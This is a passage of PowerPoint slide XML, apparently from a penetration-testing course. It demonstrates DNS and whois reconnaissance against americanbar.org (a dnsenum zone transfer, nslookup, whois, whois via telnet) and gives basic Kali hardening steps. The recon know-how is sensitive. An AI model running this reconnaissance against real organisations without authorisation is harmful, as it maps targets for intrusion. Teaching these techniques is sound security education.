          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[+] Zone Transfer was successful!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] 	 SOA ns2.abanet.org 38.99.228.178</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="200635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83BDC-128E-904C-B83C-8337F83748DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnsenum</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F454B29-88DD-5C4A-9F79-9DA1C6D140B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnsenum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnsenum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> VERSION:1.2.4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-----   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   -----</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host's addresses:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>__________________</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.                         5        IN    A        45.60.122.186</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trying Zone Transfers and getting Bind Versions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>_________________________________________________</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trying Zone Transfer for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on ns1.abanet.org ... </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.                         3600     IN    SOA </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2947182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DF98-C4EA-8543-BD05-DA923B556BBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nslookup</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{987F5B5F-76EF-2847-A731-6B06A4A5478A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -type=a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server:		192.168.104.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Address:	192.168.104.2#53</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Non-authoritative answer:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Name:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Address: 45.60.132.186</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Name:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Address: 45.60.122.186</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1756627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9A01-5CFB-9F40-A0A3-939495146CC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - IP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96E07E0F-9511-DC49-942A-16AF5F6523F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 45.60.122.186</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NetRange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:       45.60.0.0 - 45.60.255.255</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CIDR:           45.60.0.0/16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NetName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:        INCAPSULA-NET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2190164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9A234-5867-D44A-81D9-2EE094966DE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Domain Name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96B475A4-73D6-0A4D-8B56-E1137A65B381}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain Name: AMERICANBAR.ORG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Registry Domain ID: D16791045-LROR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Registrar WHOIS Server: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>whois.tucows.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Registrar URL: http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.tucows.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Updated Date: 2019-01-16T07:56:48Z</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Creation Date: 2000-01-07T16:28:52Z</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Registry Expiry Date: 2020-01-07T16:28:52Z</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4123329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7F76-F1EB-2449-B973-4BF326D8606F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic Security – Do The Needful</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C43FB814-733D-FE43-9856-06EAD16FE175}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change the default password of “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>toor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” to something more secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open a Terminal, Type “passwd” and then enter a new password twice. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change the default SSH keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/backup-keys </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># mv /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh_host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>_*  /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/backup-keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Validate SSH Keys are different</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># md5sum /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh_host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>_*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># md5sum /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/backup-keys/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh_host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>_*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Delete old SSH keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># rm –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/backup-keys</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3890745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1D103-DE24-1E49-8C52-335EF338661F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Via Telnet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A21B30FA-767C-C146-A113-56EE1C68D43B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>telnet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>whois.tucows.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 43</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trying 64.99.62.11...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Connected to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>whois.opensrs.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Escape character is '^]'.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain Name: AMERICANBAR.ORG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Registry Domain ID: D16791045-LROR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Registrar WHOIS Server: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>whois.tucows.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Registrar URL: http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tucowsdomains.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Updated Date: 2019-01-16T07:56:48</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1211605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616C-D4A0-B64A-BAA9-7F46303FE288}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Man Pages and Apropos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
